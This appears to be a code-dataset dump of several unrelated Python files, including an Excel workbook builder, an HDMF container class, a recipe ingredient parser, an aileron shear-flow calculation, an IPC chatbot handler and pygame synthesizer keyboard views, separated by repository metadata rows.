class Workbook(object):
"""
A workbook is an ordered collection of worksheets.
Once all worksheets have been added the workbook can be written out or
the worksheets can be iterated over, and any expressions present in the
tables of the worksheets will be resolved to absolute worksheet/cell references.
:param str filename: Filename the workbook will be written to.
:param list worksheets: List of :py:class:`xltable.Worksheet` instances.
"""
def __init__(self, filename=None, worksheets=[]):
self.filename = filename
self.worksheets = list(worksheets)
self.calc_mode = "auto"
self.workbook_obj = None
# The active table and worksheet objects are set during export, and
# are used to resolve expressions where the table and/or sheet isn't
# set explicitly (in which case the current table is used implicitly).
self.active_table = None
self.active_worksheet = None
def add_sheet(self, worksheet):
"""
Adds a worksheet to the workbook.
"""
self.worksheets.append(worksheet)
# alias for add_sheet
append = add_sheet
def set_calc_mode(self, mode):
"""
Set the calculation mode for the Excel workbook
"""
self.calc_mode = mode
def itersheets(self):
"""
Iterates over the worksheets in the book, and sets the active
worksheet as the current one before yielding.
"""
for ws in self.worksheets:
# Expression with no explicit table specified will use None
# when calling get_table, which should return the current worksheet/table
prev_ws = self.active_worksheet
self.active_worksheet = ws
try:
yield ws
finally:
self.active_worksheet = prev_ws
def to_xlsx(self, **kwargs):
"""
Write workbook to a .xlsx file using xlsxwriter.
Return a xlsxwriter.workbook.Workbook.
:param kwargs: Extra arguments passed to the xlsxwriter.Workbook
constructor.
"""
from xlsxwriter.workbook import Workbook as _Workbook
self.workbook_obj = _Workbook(**kwargs)
self.workbook_obj.set_calc_mode(self.calc_mode)
for worksheet in self.itersheets():
worksheet.to_xlsx(workbook=self)
self.workbook_obj.filename = self.filename
if self.filename:
self.workbook_obj.close()
return self.workbook_obj
def to_excel(self, xl_app=None, resize_columns=True):
from win32com.client import Dispatch, gencache
if xl_app is None:
xl_app = Dispatch("Excel.Application")
xl_app = gencache.EnsureDispatch(xl_app)
# Add a new workbook with the correct number of sheets.
# We aren't allowed to create an empty one.
assert self.worksheets, "Can't export workbook with no worksheets"
sheets_in_new_workbook = xl_app.SheetsInNewWorkbook
try:
xl_app.SheetsInNewWorkbook = float(len(self.worksheets))
self.workbook_obj = xl_app.Workbooks.Add()
finally:
xl_app.SheetsInNewWorkbook = sheets_in_new_workbook
# Rename the worksheets, ensuring that there can never be two sheets with the same
# name due to the sheets default names conflicting with the new names.
sheet_names = {s.name for s in self.worksheets}
assert len(sheet_names) == len(self.worksheets), "Worksheets must have unique names"
for worksheet in self.workbook_obj.Sheets:
i = 1
original_name = worksheet.Name
while worksheet.Name in sheet_names:
worksheet.Name = "%s_%d" % (original_name, i)
i += 1
for worksheet, sheet in zip(self.workbook_obj.Sheets, self.worksheets):
worksheet.Name = sheet.name
# Export each sheet (have to use itersheets for this as it sets the
# current active sheet before yielding each one).
for worksheet, sheet in zip(self.workbook_obj.Sheets, self.itersheets()):
worksheet.Select()
sheet.to_excel(workbook=self,
worksheet=worksheet,
xl_app=xl_app,
rename=False,
resize_columns=resize_columns)
return self.workbook_obj
def get_last_sheet(self):
return self.workbook_obj.Sheets[self.workbook_obj.Sheets.Count]
def add_xlsx_worksheet(self, worksheet, name):
if worksheet not in self.worksheets:
self.append(worksheet)
return self.workbook_obj.add_worksheet(name)
def add_excel_worksheet(self, after=None):
if after is None:
after = self.get_last_sheet()
return self.workbook_obj.Sheets.Add(After=after)
def add_format(self, *args, **kwargs):
return self.workbook_obj.add_format(*args, **kwargs)
def get_table(self, name):
"""
Return a table, worksheet pair for the named table
"""
if name is None:
assert self.active_table, "Can't get table without name unless an active table is set"
name = self.active_table.name
if self.active_worksheet:
table = self.active_worksheet.get_table(name)
assert table is self.active_table, "Active table is not from the active sheet"
return table, self.active_worksheet
for ws in self.worksheets:
try:
table = ws.get_table(name)
if table is self.active_table:
return table, ws
except KeyError:
pass
raise RuntimeError("Active table not found in any sheet")
# if the tablename explicitly uses the sheetname find the right sheet
if "!" in name:
ws_name, table_name = map(lambda x: x.strip("'"), name.split("!", 1))
for ws in self.worksheets:
if ws.name == ws_name:
table = ws.get_table(table_name)
return table, ws
raise KeyError(name)
# otherwise look in the current table
if self.active_worksheet:
table = self.active_worksheet.get_table(name)
return table, self.active_worksheet
# or fallback to the first matching name in any table
for ws in self.worksheets:
try:
table = ws.get_table(name)
return table, ws
except KeyError:
pass
raise KeyError(name)
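# Usage sketch -- `Worksheet` lives in xltable's worksheet module and is not
# imported here, so the lines below are illustrative only:
#
#     from xltable import Worksheet
#     wb = Workbook('report.xlsx')
#     wb.append(Worksheet('Sheet1'))
#     wb.to_xlsx()   # resolves expressions and writes report.xlsx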
| 36.465241 | 98 | 0.614753 | 834 | 6,819 | 4.899281 | 0.238609 | 0.04699 | 0.058737 | 0.030837 | 0.16838 | 0.089574 | 0.089574 | 0.071953 | 0.071953 | 0.071953 | 0 | 0.001073 | 0.316615 | 6,819 | 186 | 99 | 36.66129 | 0.875751 | 0.252676 | 0 | 0.268519 | 0 | 0 | 0.048282 | 0 | 0 | 0 | 0 | 0 | 0.037037 | 1 | 0.101852 | false | 0.018519 | 0.027778 | 0.018519 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2b1d261933a20561fc0f58daeebaf0522d9162c | 795 | py | Python | src/hdmf/common/multi.py | kangdh/hdmf | 680b68a1bbc9377590862574daea83579a3d52bc | [
"BSD-3-Clause-LBNL"
] | 25 | 2019-03-07T15:33:16.000Z | 2022-02-16T20:03:57.000Z | src/hdmf/common/multi.py | kangdh/hdmf | 680b68a1bbc9377590862574daea83579a3d52bc | [
"BSD-3-Clause-LBNL"
] | 641 | 2019-02-02T00:31:12.000Z | 2022-03-31T18:16:54.000Z | src/hdmf/common/multi.py | kangdh/hdmf | 680b68a1bbc9377590862574daea83579a3d52bc | [
"BSD-3-Clause-LBNL"
] | 16 | 2019-02-05T18:21:35.000Z | 2022-02-14T23:37:21.000Z | from . import register_class
from ..container import Container, Data, MultiContainerInterface
from ..utils import docval, call_docval_func, popargs
@register_class('SimpleMultiContainer')
class SimpleMultiContainer(MultiContainerInterface):
__clsconf__ = {
'attr': 'containers',
'type': (Container, Data),
'add': 'add_container',
'get': 'get_container',
}
@docval({'name': 'name', 'type': str, 'doc': 'the name of this container'},
{'name': 'containers', 'type': (list, tuple), 'default': None,
'doc': 'the Container or Data objects in this file'})
def __init__(self, **kwargs):
containers = popargs('containers', kwargs)
call_docval_func(super().__init__, kwargs)
self.containers = containers
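# Usage sketch -- the names below are illustrative; Container comes from
# hdmf.container as imported above:
#
#     smc = SimpleMultiContainer(name='collection',
#                                containers=[Container(name='a')])
#     smc.get_container('a')   # accessor generated from __clsconf__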
| 34.565217 | 79 | 0.646541 | 80 | 795 | 6.175 | 0.475 | 0.052632 | 0.05668 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.215094 | 795 | 22 | 80 | 36.136364 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0.240252 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.166667 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2b566b0a199706f1df36c5f72956f395886a3fe | 3,688 | py | Python | output.py | brianray/chipy_phaser_flask | 94d869a5547e0c9880aeb6687f35b4107d4bd228 | [
"Apache-2.0"
] | 1 | 2017-10-26T14:31:47.000Z | 2017-10-26T14:31:47.000Z | output.py | brianray/chipy_phaser_flask | 94d869a5547e0c9880aeb6687f35b4107d4bd228 | [
"Apache-2.0"
] | null | null | null | output.py | brianray/chipy_phaser_flask | 94d869a5547e0c9880aeb6687f35b4107d4bd228 | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
import fractions
import copy
solids = ("flour", "sugar", "salt", "shortening")
liquids = ("water", "spice")
large_items = ("apples", "eggs")
class IngredientBase:
" Base class for common functionality "
target = ()
def __init__(self, ingredient_str):
self.original_ingredient_str = ingredient_str
self.parse_parts(ingredient_str)
self.normalize_qty()
def __repr__(self):
return "<Ingredient ({}): {} - {} {}>".format(self.name,
self.item,
self.qty,
self.unit)
def parse_parts(self, ingredient_str):
parts = ingredient_str.split()
self.qty = parts[0]
self.qty_max = 0
self.unit = parts[1]
self.item = " ".join(parts[2:])
if self.unit == "to" or "-" in self.qty: # means a range was enetered
if "-" in self.qty:
minsize, maxsize = self.qty.split("-")
self.qty = minsize
self.qty_max = maxsize
else: # to
self.qty = parts[0]
self.qty_max = parts[2]
self.unit = parts[3]
self.item = " ".join(parts[4:])
def does_match_target(self, subject_str):
""" Checks if any of the strings in self.target exitst in subject_str
returns: True or False
"""
for item in self.target:
if item.lower() in subject_str.lower():
return True
return False
def normalize_qty(self):
self.qty = fractions.Fraction(self.qty)
def copy(self):
return copy.copy(self)
def empty(self):
to_empty = self.copy()
to_empty.qty = fractions.Fraction(0)
return to_empty
class DrySolid(IngredientBase):
"class for dry solids, like sugar or flour"
name = "solid"
target = solids
class Liquid(IngredientBase):
"class for liquids, like milk or beer"
name = "liquid"
target = liquids
class LargeItem(IngredientBase):
"class for items, like an egg or apple"
name = "large item"
target = large_items
def parse_parts(self, ingredient_str):
parts = ingredient_str.split()
self.qty = parts[0]
self.qty_max = 0
self.unit = "item"
self.item = " ".join(parts[1:])
if self.unit == "to" or "-" in self.qty: # means a range was enetered
if "-" in self.qty:
minsize, maxsize = self.qty.split("-")
self.qty = minsize
self.qty_max = maxsize
else: # to
self.qty = parts[0]
self.qty_max = parts[2]
self.unit = "item"
self.item = " ".join(parts[3:])
def return_instance(ingredient):
"given an ingredient string, return the intance"
instance = None
if is_ingredient_in_list(solids, ingredient):
instance = DrySolid(ingredient) #<-- now put it here
elif is_ingredient_in_list(liquids, ingredient):
instance = Liquid(ingredient) #<-- and here
elif is_ingredient_in_list(large_items, ingredient):
instance = LargeItem(ingredient) #<-- and here
else:
raise Exception("don't know what is '{}'".format(ingredient))
# removed the parse call
return instance
def is_ingredient_in_list(the_list, ingredient_string):
"if any item "
for list_item in the_list:
if list_item in ingredient_string:
return True
return False
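# Usage sketch of the dispatcher above (inputs are illustrative):
#
#     return_instance("2 cups flour")   # -> DrySolid, qty == Fraction(2)
#     return_instance("1-2 eggs")       # -> LargeItem, qty == Fraction(1), qty_max == '2'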
| 31.793103 | 77 | 0.548265 | 425 | 3,688 | 4.621176 | 0.254118 | 0.074847 | 0.03055 | 0.026477 | 0.293279 | 0.293279 | 0.266802 | 0.245418 | 0.245418 | 0.245418 | 0 | 0.006656 | 0.348156 | 3,688 | 115 | 78 | 32.069565 | 0.810316 | 0.120119 | 0 | 0.336957 | 0 | 0 | 0.101665 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0 | 0.021739 | 0.021739 | 0.336957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2b650a2c9fcb4957af24d4d2a31a4ce6388ab32 | 9,261 | py | Python | shear_force.py | albiboni/AileronSimulation | 7b7cdb6759a285bc9729e8594979c428ba3620af | [
"MIT"
] | 6 | 2019-02-05T06:03:20.000Z | 2021-06-26T23:15:25.000Z | shear_force.py | xaviergoby/AileronSimulation | 7b7cdb6759a285bc9729e8594979c428ba3620af | [
"MIT"
] | null | null | null | shear_force.py | xaviergoby/AileronSimulation | 7b7cdb6759a285bc9729e8594979c428ba3620af | [
"MIT"
] | 4 | 2019-02-12T22:22:57.000Z | 2021-06-26T23:15:26.000Z | import numpy as np
from Boom import *
from inertia import *
from reaction_forces import *
from internal_forces import *
import matplotlib.pyplot as plt
Iyy, Izz = get_inertia(Booms) #coordinate frame crosssection
Cz = centroid(Booms)
'''
Calculates Shear flow in the structure
'''
def get_forces(position, theta):
'''
this function computes the sum of forces in y and z in the cross-section reference frame at a given x position
:param position: position in x direction in global reference frame from hinge3 --> hinge1
:param theta: rotation angle of cross_section
:return: sum of forces in y and z in the cross_section reference system at the specific x position
'''
rotate_y = np.dot(rotation_matrix(theta),np.array([0., get_shear_Fy(position, 1,1,1)]))
rotate_z = np.dot(rotation_matrix(theta),np.array([get_shear_Fz(position, 1,1,1), 0.]))
Vy = rotate_y[1]+ rotate_z[1]
Vz = rotate_y[0] + rotate_z[0]
return Vy, Vz
def get_qb(NSpS, Iyy, Izz, Vz1, Vy1, BrA):
'''
Get open section shear flow q_B with imaginary cut.
:param NSpS: half number of booms
:param Iyy: inertia in y
:param Izz: inertia in z
:param Vz1: sum of forces in z
:param Vy1: sum of forces in y
:param BrA: boom area
:return: shear flow q_B
'''
Qb = np.zeros(NSpS+3)
Qb[7] = -Vz1/Iyy*BrA[7]*Sty[7] - Vy1/Izz*BrA[7]*(StZ[7] - Cz) + Qb[8]
Qb[6] = -Vz1/Iyy*BrA[6]*Sty[6] - Vy1/Izz*BrA[6]*(StZ[6] - Cz) + Qb[7]
Qb[5] = -Vz1/Iyy*BrA[5]*Sty[5] - Vy1/Izz*BrA[5]*(StZ[5] - Cz) + Qb[6]
Qb[4] = -Vz1/Iyy*BrA[4]*Sty[4] - Vy1/Izz*BrA[4]*(StZ[4] - Cz) + Qb[5]
Qb[3] = -Vz1/Iyy*BrA[3]*Sty[3] - Vy1/Izz*BrA[3]*(StZ[3] - Cz) + Qb[4]
Qb[1] = (-Vz1/Iyy*BrA[1]*Sty[1] - Vy1/Izz*BrA[1]*(StZ[1] - Cz)) + Qb[0]
Qb[2] = (-Vz1/Iyy*BrA[2]*Sty[2] - Vy1/Izz*BrA[2]*(StZ[2] - Cz)) + Qb[1]
Qb[9] = (-Vz1/Iyy*BrA[8]*Sty[8] - Vy1/Izz*BrA[8]*(StZ[8] - Cz)) + Qb[1] - Qb[2]
return Qb
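# In equation form, the step in open-section ("base") shear flow at boom k is
#   dq_B[k] = -(Vz/Iyy) * B_k * y_k - (Vy/Izz) * B_k * (z_k - Cz)
# and the assignments above accumulate these steps boom by boom, walking away
# from the imaginary cut (Qb[0] and Qb[8] stay zero at the cuts).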
def get_Qs01(ha, q, Sa, skt, spt, s): #closed section shear flow 1 for the LE of the Aileron
'''
closed section shear flow 1 for the semicircle part
:param ha: aileron height [m]
:param q: open section shear flow
:param Sa: half of the surface distance of the Aileron
:param skt: skin thickness
:param spt: Spar thickness
:param s: Stringer Location
:return: closed section shear flow 1 for the semicircle part
'''
q1c1 = 2*(q[1]*(s[8] - s[1])) + q[9]*ha*skt/spt
q1c2 = -(2*((s[8] - s[0])) + ha*skt/spt)
q2c1 = 2*(q[3]*(s[3] - s[2]) + q[2]*(s[2] - s[8]) + q[4]*(s[4] - s[3]) + q[5]*(s[5] - s[4]) + q[6]*(s[6] - s[5]) + q[7]*(s[7] - s[6]) + q[8]*(Sa - s[7])) - q[9]*ha*skt/spt
q2c2 = -(2*(Sa - s[8]) + ha*skt/spt)
h3 = ha*skt/spt
qs02 = (q2c1 - (q1c1/q1c2)*h3)/(q2c2 + h3**2/q1c2)
qs01 = (q1c1 - qs02*h3)/q1c2
return qs01
def get_Qs02(ha, q, Sa, skt, spt, s):
'''
closed section shear flow 2 for the triangular part
:param ha: aileron height [m]
:param q: open section shear flow
:param Sa: half of the surface distance of the Aileron
:param skt: skin thickness
:param spt: Spar thickness
:param s: Stringer Location
:return: closed section shear flow 2 for the triangular part
'''
q1c1 = 2*(q[1]*(s[8] - s[1])) + q[9]*ha*skt/spt
q1c2 = -(2*((s[8] - s[0])) + ha*skt/spt)
q2c1 = 2*(q[3]*(s[3] - s[2]) + q[2]*(s[2] - s[8]) + q[4]*(s[4] - s[3]) + q[5]*(s[5] - s[4]) + q[6]*(s[6] - s[5]) + q[7]*(s[7] - s[6]) + q[8]*(Sa - s[7])) - q[9]*ha*skt/spt
q2c2 = -(2*(Sa - s[8]) + ha*skt/spt)
h3 = ha*skt/spt
qs02 = (q2c1 - (q1c1/q1c2)*h3)/(q2c2 + h3**2/q1c2)
qs01 = (q1c1 - qs02*h3)/q1c2
return qs02
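# Note: get_Qs01/get_Qs02 solve the two coupled cell equations (semicircle and
# triangle) that share the spar term h3 = ha*skt/spt; qs02 is obtained by
# eliminating qs01 from the pair, and qs01 follows by back-substitution.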
def get_q_shear(NSpS, Iyy, Izz, Vz1, Vy1, BrA, qs01, qs02):
'''
Get open section shear flow q_B with imaginary cut.
:param NSpS: half number of booms
:param Iyy: inertia in y
:param Izz: inertia in z
:param Vz1: sum of forces in z
:param Vy1: sum of forces in y
:param BrA: boom area
:return: shear flow q_B
'''
Qb = np.zeros((NSpS+3))
Qb[0] = qs01
Qb[8] = qs02
Qb[7] = -Vz1/Iyy*BrA[7]*Sty[7] - Vy1/Izz*BrA[7]*(StZ[7] - Cz) + Qb[8]
Qb[6] = -Vz1/Iyy*BrA[6]*Sty[6] - Vy1/Izz*BrA[6]*(StZ[6] - Cz) + Qb[7]
Qb[5] = -Vz1/Iyy*BrA[5]*Sty[5] - Vy1/Izz*BrA[5]*(StZ[5] - Cz) + Qb[6]
Qb[4] = -Vz1/Iyy*BrA[4]*Sty[4] - Vy1/Izz*BrA[4]*(StZ[4] - Cz) + Qb[5]
Qb[3] = -Vz1/Iyy*BrA[3]*Sty[3] - Vy1/Izz*BrA[3]*(StZ[3] - Cz) + Qb[4]
Qb[1] = (-Vz1/Iyy*BrA[1]*Sty[1] - Vy1/Izz*BrA[1]*(StZ[1] - Cz)) + Qb[0]
Qb[2] = (-Vz1/Iyy*BrA[2]*Sty[2] - Vy1/Izz*BrA[2]*(StZ[2] - Cz)) + Qb[1]
Qb[9] = (-Vz1/Iyy*BrA[8]*Sty[8] - Vy1/Izz*BrA[8]*(StZ[8] - Cz)) + Qb[1] - Qb[2]
#rest= -Qb[:-1] #better positive
#q_total = np.append(Qb, rest)
return Qb
def Shear_moment_arm(NSpS, StZ, Sty, ha, Qsc): # finding the moment arm for the moment equation for shear flows.
q = Qsc
Qsct = 0
Qscy = np.zeros(NSpS + 3)
Qscy[0] = 2 * Qsc[0] * (StZ[1] - StZ[0]) * Sty[0]
Qscy[1] = 2 * Qsc[1] * np.abs(StZ[8] - StZ[1]) * Sty[1]
Qscy[2] = 2 * Qsc[2] * np.abs(StZ[2] - StZ[8]) * Sty[8]
Qscy[3] = 2 * Qsc[3] * np.abs(StZ[3] - StZ[2]) * Sty[2]
Qscy[4] = 2 * Qsc[4] * np.abs(StZ[4] - StZ[3]) * Sty[3]
Qscy[5] = 2 * Qsc[5] * np.abs(StZ[5] - StZ[4]) * Sty[4]
Qscy[6] = 2 * Qsc[6] * np.abs(StZ[6] - StZ[5]) * Sty[5]
Qscy[7] = 2 * Qsc[7] * np.abs(StZ[7] - StZ[6]) * Sty[6]
Qscy[8] = 0
Qscy[9] = 0
Qscz = np.zeros(NSpS + 3)
Qscz[0] = 2 * Qsc[0] * (Sty[1] - Sty[0]) * (StZ[0] - ha / 2)
Qscz[1] = 2 * Qsc[1] * (Sty[8] - Sty[1]) * (StZ[1] - ha / 2)
Qscz[2] = 2 * Qsc[2] * (Sty[2] - Sty[8]) * (StZ[8] - ha / 2)
Qscz[3] = 2 * Qsc[3] * (Sty[3] - Sty[2]) * (StZ[2] - ha / 2)
Qscz[4] = 2 * Qsc[4] * (Sty[4] - Sty[3]) * (StZ[3] - ha / 2)
Qscz[5] = 2 * Qsc[5] * (Sty[5] - Sty[4]) * (StZ[4] - ha / 2)
Qscz[6] = 2 * Qsc[6] * (Sty[6] - Sty[5]) * (StZ[5] - ha / 2)
Qscz[7] = 2 * Qsc[7] * (Sty[7] - Sty[6]) * (StZ[6] - ha / 2)
Qscz[8] = 0
Qscz[9] = Qsc[9] * (ha) * (StZ[8] - ha / 2)
for i in range(0, NSpS + 3):
Qsct += Qscy[i] + Qscz[i]
return Qsct
def ShearCenterZ(Qsct, qs01, qs02, Ac, At, ha, Vy):
VZsc = ((Qsct + 2*Ac*qs01 + 2*At*qs02))/Vy - ha/2
#VYsc = ((Qsct + 2*Ac*qs01 + 2*At*qs02))/Vzsc
#print "this should be 0 for shear center Y: ", VYsc/Vzsc
return VZsc
def get_q_torque(position):
Torque = -get_moment_Mx(position, 1., 1., 1.)
triangle_term = (2*Lsl/t_sk+h_a/t_sp)/(2.*At*G)
circle_term = (CirC/2*t_sk + h_a/t_sp)/(2*Ac*G)
A_torque = np.array([[1., 1., 0, 0],
[-1., 0, 2. * Ac, 0],
[0, -1., 0, 2. * At],
[0, 0, circle_term, -triangle_term]])
b_torque = np.array([Torque, 0., 0.,0.])
sol_torq = np.linalg.solve(A_torque, b_torque) #Tc, Tt, qTc, qTt
return sol_torq
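# The 4x4 system above solves for [Tc, Tt, qTc, qTt]:
#   Tc + Tt = T                          (torque split between the two cells)
#   Tc = 2*Ac*qTc and Tt = 2*At*qTt      (Bredt's formula per closed cell)
#   circle_term*qTc = triangle_term*qTt  (equal rate of twist in both cells)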
def get_twist(position):
q = get_q_torque(position)[3]
circle_term = (CirC / 2 * t_sk + h_a / t_sp) / (2 * Ac * G)
triangle_term = (2 * Lsl / t_sk + h_a / t_sp) / (2. * At * G)
theta_distribution = q*triangle_term
return theta_distribution*180./np.pi
'''Print shear center
Vy, Vz = get_forces(1.5, theta)
qb = get_qb(NSpS, Iyy, Izz, Vz, Vy, BrA)
qs01 = get_Qs01(h_a, qb, Sa, t_sk, t_sp, StrinLoc)
qs02 = get_Qs02(h_a, qb, Sa, t_sk, t_sp, StrinLoc)
moment_arm = Shear_moment_arm(NSpS, StZ, Sty, h_a, qb)
print(ShearCenterZ(moment_arm, qs01, qs02, Ac, At, h_a, Vy))
'''
'''Print Twist'''
n_points = 1000
x_points = np.linspace(0, l_a, num=n_points)
step = 2.6e-3
y_points = np.zeros((n_points))
start_angle = 28
for i in range(np.size(x_points)):
start_angle += get_twist(x_points[i])*step
y_points[i] += start_angle
plt.plot(x_points,y_points)
plt.title("Aileron's twist along the span")
plt.xlabel('Span-wise location[m], from hinge 3 to 1', fontsize=10)
plt.ylabel('Aileron twist [deg]', fontsize=10)
plt.legend()
plt.show()
def compute_q(position):
Vy, Vz = get_forces(position, theta) #first entry refers to the position
qb = get_qb(NSpS, Iyy, Izz, Vz, Vy, BrA)
qs01 = get_Qs01(h_a, qb, Sa, t_sk, t_sp, StrinLoc)
qs02 = get_Qs02(h_a, qb, Sa, t_sk, t_sp, StrinLoc)
q_shear = get_q_shear(NSpS, Iyy, Izz, Vz, Vy, BrA, qs01, qs02)
q_T=get_q_torque(position)
q_circle = q_shear[:2]+q_T[2],
q_spar = q_shear[9]+q_T[2]-q_T[3]
q_triangle = q_shear[2:9] + q_T[3]
q_tot = np.append(q_circle,np.append(q_triangle,q_spar))
return q_tot
'''Get max shear in ribs
n_points = 1000
x_points = np.linspace(0, l_a, num=n_points)
y_points = np.zeros((n_points,3))
for i in range(np.size(x_points)):
run = compute_q(x_points[i])
idx = np.argmax(run)
y_points[i] = np.append(x_points[i], np.append(idx, run[int(idx)]))
idx = np.argmax(y_points[:,2])
y_points = y_points
massimo = y_points[idx]
print(massimo)
x_points= np.array([x_R_1y, x_F_I, x_P, x_R_2y])
n_points = 1000
#x_points = np.linspace(0, l_a, num=n_points)
y_points = np.zeros((len(x_points),3))
for i in range(np.size(x_points)):
run = compute_q(x_points[i])
idx = np.argmax(run)
y_points[i] = np.append(x_points[i], np.append(idx, run[idx]))
y_points = y_points
print(y_points)
'''
| 36.317647 | 175 | 0.57672 | 1,770 | 9,261 | 2.924294 | 0.120339 | 0.018547 | 0.027821 | 0.01507 | 0.555641 | 0.552743 | 0.5284 | 0.504057 | 0.49942 | 0.482032 | 0 | 0.075385 | 0.222222 | 9,261 | 254 | 176 | 36.46063 | 0.643204 | 0.195983 | 0 | 0.276923 | 0 | 0 | 0.014512 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.046154 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a2b74876fe16e263d2f11a53b922f99526d2c23f | 682 | py | Python | src/agent/message_handler.py | GMcLachlan45/chatbot-app | 38e48092a611d91d594a173adf07b267bea38cfe | [
"MIT"
] | null | null | null | src/agent/message_handler.py | GMcLachlan45/chatbot-app | 38e48092a611d91d594a173adf07b267bea38cfe | [
"MIT"
] | null | null | null | src/agent/message_handler.py | GMcLachlan45/chatbot-app | 38e48092a611d91d594a173adf07b267bea38cfe | [
"MIT"
] | null | null | null | from agent import Agent
from ipc.ipc_message import IPCMessage
from ipc.ipc_pipe import IPCPipe
from ipc.ipc_message_handler import IPCMessageHandler
MESSAGE_TYPE = {
"AGENT_RESPONSE": 0,
"AGENT_QUERY": 1,
}
class MessageHandler(IPCMessageHandler):
def __init__(self, agent: Agent):
self.agent = agent
def handle_message(self, ipc_pipe: IPCPipe, message: IPCMessage):
if (message.type == MESSAGE_TYPE["AGENT_QUERY"]):
agent_response = self.agent.query(message.body)
ipc_pipe.send_message(
MESSAGE_TYPE["AGENT_RESPONSE"],
agent_response,
message.id
) | 29.652174 | 69 | 0.648094 | 77 | 682 | 5.467532 | 0.324675 | 0.104513 | 0.071259 | 0.08076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004008 | 0.268328 | 682 | 23 | 70 | 29.652174 | 0.839679 | 0 | 0 | 0 | 0 | 0 | 0.073206 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.105263 | false | 0 | 0.210526 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
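# Wiring sketch -- the concrete construction of `agent` and `pipe` is left to
# the ipc/agent modules and is only assumed here:
#
#     handler = MessageHandler(agent)
#     handler.handle_message(pipe, incoming)  # replies with an AGENT_RESPONSE
#                                             # whenever incoming is AGENT_QUERY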
a2b850d63e534fdf62f6375992b652934851f931 | 3,440 | py | Python | view.py | alexeifigueroa/ASEPetSynthesizer | bcb611412d3167675de1009da93d9976ad1e0ac7 | [
"MIT"
] | null | null | null | view.py | alexeifigueroa/ASEPetSynthesizer | bcb611412d3167675de1009da93d9976ad1e0ac7 | [
"MIT"
] | null | null | null | view.py | alexeifigueroa/ASEPetSynthesizer | bcb611412d3167675de1009da93d9976ad1e0ac7 | [
"MIT"
] | null | null | null | '''
Created on Jan 3, 2018
@author: Alexei Figueroa
This module holds the classes related to views in the synthesizer application.
'''
import pygame,abc,CONSTANTS
class View(metaclass=abc.ABCMeta):
"""
Abstract class specifying the method signatures of a View
"""
def __init__(self, screen):
self.screen=screen
@abc.abstractmethod
def draw(self):
"""
This method should enable the View to be rendered on
the screen.
"""
class KeyboardView(View):
'''
This class draws the synthesizer keyboard on the screen;
it implements the View interface.
'''
def __init__(self, screen):
'''
Constructor
@screen: pygame.display
Canvas where the keyboard will be rendered
'''
super().__init__(screen)
self.__pressed={}
def draw(self):
'''
This method renders each key and sets a label on each one,
depending on the state of the View.
'''
x0=90
y0=40
label_font = pygame.font.SysFont("monospace", 15)
#Render white keys
for code,k,label,x in CONSTANTS.whites:
width=20
height=200
x_i=10+x*(width+2)+x0
color_i=CONSTANTS.color_white if code not in self.pressed else CONSTANTS.color_pressed
pygame.draw.rect(self.screen, color_i, [x_i, y0, width, height])
k_label = label_font.render(k, 1, CONSTANTS.color_black)
self.screen.blit(k_label, (x_i+width/3, height-20+y0))
#Render black keys
for code,k,label,x in CONSTANTS.blacks:
color_i=CONSTANTS.color_black if code not in self.pressed else CONSTANTS.color_pressed
width=15
height=130
x_i=10+(20+2)*x-width/2+x0
pygame.draw.rect(self.screen, color_i, [x_i, y0, width, height])
k_label = label_font.render(k, 1, CONSTANTS.color_white)
self.screen.blit(k_label, (x_i+width/5, height-20+y0))
"""
Getters and setters, properties
"""
#Property holding the state of the pressed keys in the View.
def set_pressed(self,pressed):
self.__pressed=pressed
def get_pressed(self):
return self.__pressed
pressed=property(get_pressed,set_pressed)
class VibratoView(View):
"""
This class draws the vibrato control on the screen; it implements
the View interface
"""
def __init__(self, screen):
'''
Constructor
@screen: pygame.display
Canvas where the vibrato control will be rendered
'''
super().__init__(screen)
self.__vibrato=False
def draw(self):
label_font = pygame.font.SysFont("monospace", 15)
vibrato_state={False:"Toggle vibrato with V (off)",
True:"Toggle vibrato with V (on)"}
vibrato_label = label_font.render(vibrato_state[self.__vibrato], 1, CONSTANTS.color_white)
pygame.draw.rect(self.screen,CONSTANTS.color_black,[20,280,400,20])
self.screen.blit(vibrato_label, (20, 280))
"""
Getters and setters, properties
"""
#Property holding the state of the vibrato being displayed.
def get_vibrato(self):
return self.__vibrato
def set_vibrato(self,vibrato):
self.__vibrato=vibrato
